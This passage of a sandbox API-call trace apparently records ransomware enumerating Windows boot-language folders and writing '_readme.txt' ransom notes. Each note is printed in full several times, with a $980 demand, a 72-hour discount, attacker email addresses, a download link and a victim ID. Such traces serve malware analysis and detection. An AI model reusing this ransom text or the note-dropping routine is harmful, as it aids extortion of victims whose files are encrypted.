out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.089] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0188.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.089] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.089] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.089] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.091] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.092] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.092] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.092] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0188.092] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.100] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0188.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.101] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0188.101] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.103] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0188.104] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.104] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.105] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.105] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0188.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.105] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.105] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.105] PathFindFileNameW (pszPath="") returned="" [0188.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.106] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.106] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.106] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.107] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.107] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.107] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0188.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.107] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.107] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.107] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.109] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.110] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.110] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.110] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0188.111] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.111] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.111] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.112] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.112] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 